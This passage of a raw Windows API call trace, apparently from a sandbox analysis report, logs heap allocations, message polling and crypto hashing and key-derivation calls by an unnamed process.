hHeap=0x970000) returned 1 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0269.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0269.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0269.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e52048 [0269.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e52048, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0269.327] CryptHashData (hHash=0xa87050, pbData=0x2e54f08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0269.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.328] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.329] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.329] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0269.329] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52318 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523f0 [0269.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e52450 [0269.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e52450, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0269.329] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0269.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52438 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52420 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52330 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52330 | out: hHeap=0x970000) returned 1 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52420 | out: hHeap=0x970000) returned 1 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52450 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521f8 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521c8 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521c8 | out: hHeap=0x970000) returned 1 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521f8 | out: hHeap=0x970000) returned 1 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e524b0 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52360 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52420 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52420 | out: hHeap=0x970000) returned 1 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52360 | out: hHeap=0x970000) returned 1 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523c0 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52420 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52300 [0269.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52300 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52420 | out: hHeap=0x970000) returned 1 [0269.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52318 [0269.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521c8 [0269.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52330 [0269.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52330 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521c8 | out: hHeap=0x970000) returned 1 [0269.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523f0 [0269.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52330 [0269.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52258 [0269.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52258 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52330 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523a8 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0269.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0269.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0269.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0269.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0269.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0269.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0269.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0269.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0269.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e52030 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e52090 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e52138 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ee0 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e520a8 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e52018 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ef8 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e52150 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0269.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51f58 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51fd0 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51fe8 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e520d8 [0269.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e52060 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e52078 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e52000 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51f40 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.346] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.346] HeapFree (in: hHeap=0x970000, 